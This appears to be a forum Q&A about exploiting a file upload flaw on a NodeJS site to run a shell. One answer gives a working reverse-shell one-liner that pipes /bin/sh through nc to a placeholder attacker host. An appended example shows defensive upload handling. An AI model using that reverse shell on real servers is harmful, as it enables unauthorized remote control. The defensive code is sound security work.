Mourad

Reputation: 41

NodeJS remote file upload vulnerability

I'm trying to learn the NodeJS pentesting process. I have found a remote file upload vulnerability in a NodeJS website. Can I upload a remote shell in NodeJS, like we do in PHP or ASPX, and execute commands? Can I upload a NodeJS shell.js and execute Unix commands on the server from this shell?

Upvotes: 3

Views: 6823

Answers (2)

daronwolff

Reputation: 2064

It's possible only if you can "EXECUTE" the file.

But if you can "execute" JavaScript code you could create a reverse shell using this:

(function () {
    require("child_process")
    .exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attackerIP> <attackerPort> >/tmp/f')
})();

Otherwise, if you can't execute the file, you will only see the content of the file:

https://myvulnerablewebsite.com/hack.js

Upvotes: 0

Dykotomee

Reputation: 770

Not sure if this is what you're looking for, but if you have the ability to upload a NodeJS script to a server and execute it, then yes, you can run shell commands using child_process.exec (see here for a similar question/answer).

Upvotes: 2
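
Both answers hinge on whether the server will ever execute an uploaded file. As an added example (not part of the original thread or either answer), here is one way an upload handler can keep uploaded files inert on the server; the directory paths, the extension allowlist and the function names are assumptions made for illustration:

```javascript
// Added example: upload storage that keeps client-supplied files inert.
// APP_ROOT, UPLOAD_ROOT, ALLOWED_EXT, isInside and planUpload are
// hypothetical names chosen for this sketch.
const path = require("path");
const crypto = require("crypto");

const APP_ROOT = "/srv/app";        // assumed: the code the Node process loads
const UPLOAD_ROOT = "/srv/uploads"; // assumed: data-only directory
const ALLOWED_EXT = new Set([".png", ".jpg", ".jpeg", ".pdf"]);

// True when `child` is `parent` itself or lies beneath it.
function isInside(parent, child) {
  const rel = path.relative(parent, child);
  if (rel === "") return true;
  return rel !== ".." && !rel.startsWith(".." + path.sep) && !path.isAbsolute(rel);
}

// Decide where an upload may be stored. The client file name is read only
// for its extension; the stored name is random, so a request cannot pick a
// path, overwrite application code, or leave a .js file on disk.
function planUpload(clientName, uploadRoot = UPLOAD_ROOT, appRoot = APP_ROOT) {
  const root = path.resolve(uploadRoot);

  // Uploads must live outside the tree that require()/import resolves from.
  if (isInside(path.resolve(appRoot), root)) {
    return { ok: false, reason: "upload root is inside the application tree" };
  }

  // Allowlist on the final extension; anything else (.js, .mjs, .node, none)
  // is refused before a single byte is written.
  const ext = path.extname(String(clientName)).toLowerCase();
  if (!ALLOWED_EXT.has(ext)) {
    return { ok: false, reason: "file type not allowed" };
  }

  const storedName = crypto.randomBytes(16).toString("hex") + ext;
  return { ok: true, storedPath: path.join(root, storedName) };
}
```
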
